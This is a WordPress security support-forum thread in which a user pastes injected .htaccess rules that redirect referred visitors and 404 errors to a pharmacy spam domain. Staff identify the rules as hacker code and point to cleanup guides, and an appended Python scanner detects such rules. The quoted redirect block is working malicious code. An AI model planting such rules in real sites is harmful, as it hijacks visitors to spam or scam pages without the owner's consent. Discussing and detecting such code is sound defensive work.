hacker redirect htaccess code


  • #12780
    Living In Puglia
    Participant

    I am very confused … when I look at Current Root htaccess file in the Bulletproof control panel all looks good … starts

    #   BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS
    # If you edit the BULLETPROOF .49.8 >>>>>>> SECURE .HTACCESS text above
    # you will see error messages on the BPS Security Status page
    # BPS is reading the version number in the htaccess file to validate checks
    # If you would like to change what is displayed above you
    # will need to edit the BPS /includes/functions.php file to match your changes
    # If you update your WordPress Permalinks the code between BEGIN WordPress and
    # END WordPress is replaced by WP htaccess code.
    # This removes all of the BPS security code and replaces it with just the default WP htaccess code
    # To restore this file use BPS Restore or activate BulletProof Mode for your Root folder again.
    
    # BEGIN WordPress
    # IMPORTANT!!! DO NOT DELETE!!! - B E G I N WordPress above or E N D WordPress - text in this file
    # They are reference points for WP, BPS and other plugins to write to this htaccess file.
    # IMPORTANT!!! DO NOT DELETE!!! - BPSQSE BPS QUERY STRING EXPLOITS - text
    # BPS needs to find the - BPSQSE - text string in this file to validate that your security filters exist
    
    # TURN OFF YOUR SERVER SIGNATURE
    ServerSignature Off
    
    ***************************************
    
    But when I look at the actual .htaccess file I have
    ErrorDocument 404 http://buyrxcheap24.com/
    
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*imap.* [OR]
    RewriteCond %{HTTP_REFERER} .*mail* [OR]
    RewriteCond %{HTTP_REFERER} .*inbox* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*gmx.* [OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*
    RewriteRule ^(.*)$ http://buyrxcheap24.com/ [R=301,L]
    
    *************************************

    I have tried recreating the htaccess files but get the same result! Totally Confused now

    #12786
    AITpro Admin
    Keymaster

    That htaccess code is not BPS code and is hacker redirect code added by something/someone else.  Your website is already compromised/hacked.  See this Forum Topic link below for what to do next and also the link for the WordPress.org thread post.

    Website already hacked before installing BPS/BPS Pro
    http://forum.ait-pro.com/forums/topic/website-is-already-hacked-will-bps-pro-automatically-fix-or-remove-the-hackers-files-and-code/

    Similar/same hacking method
    http://wordpress.org/support/topic/htaccess-hacked-redirects-to-russion-site?replies=30

    #12793
    Living In Puglia
    Participant

    Thank you. I’ve been working through the sites and pretty much got back to normal I think. I’m on a shared server with a number of different domains/web sites, some on Joomla and some on WordPress. It’s pretty much looking like the original hack came into one of the Joomla sites!

    #12803
    AITpro Admin
    Keymaster

    We just posted this step-by-step WordPress hack cleanup/repair Topic since we receive emails very frequently from folks wanting to know if BPS will automatically clean up a hacked website.  This post/topic was on our “to-do” list so it is now “to-done”.  😉  I think the general idea of the cleanup/repair steps will also work in general for Joomla or other site types.  Obviously there are going to be technical/specific things that are not going to be the same between WordPress and Joomla, but the general approach is probably the best approach to take for website hack cleanup/repair.

    http://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

     

    #12836
    Living In Puglia
    Participant

    Thanks …. very helpful
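
As an added example (not part of the original posts and not BPS code), here is a small Python check for the two patterns visible in the injected file quoted in the first post: an ErrorDocument that points at an external URL, and a RewriteRule that redirects to an external host, noting when HTTP_REFERER conditions gate it. The function names, the constructed sample text and the placeholder hosts redirect.example and www.mysite.example are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample modeled on the injected block quoted in the thread,
# followed by benign rules; both host names are placeholders.
SAMPLE = """\
ErrorDocument 404 http://redirect.example/

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*gmail.*
RewriteRule ^(.*)$ http://redirect.example/ [R=301,L]

# BEGIN WordPress
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
RewriteCond %{HTTP_REFERER} !^https?://www\\.mysite\\.example/ [NC]
RewriteRule \\.(jpg|png)$ - [F]
"""

def external_host(target, own_hosts):
    """Return the host of an absolute http(s) target that is not one of ours."""
    host = urlparse(target).hostname if re.match(r"https?://", target, re.I) else None
    return host if host and host.lower() not in own_hosts else None

def scan_htaccess(text, own_hosts=()):
    """Return (line_number, finding, host) tuples for suspicious directives."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond = [], False
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "errordocument" and len(parts) >= 3:
            host = external_host(parts[2], own)
            if host:
                findings.append((n, "external ErrorDocument", host))
        elif directive == "rewritecond":
            # Conditions accumulate until the next RewriteRule consumes them.
            referer_cond = referer_cond or "%{http_referer}" in line.lower()
        elif directive == "rewriterule":
            host = external_host(parts[2], own) if len(parts) >= 3 else None
            if host:
                kind = "referer-conditioned " if referer_cond else ""
                findings.append((n, kind + "external redirect", host))
            referer_cond = False
    return findings
```

On a shared account with several sites, call scan_htaccess on the contents of each site's .htaccess and pass that site's own host names in own_hosts, so legitimate canonical-host redirects are not reported.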

     
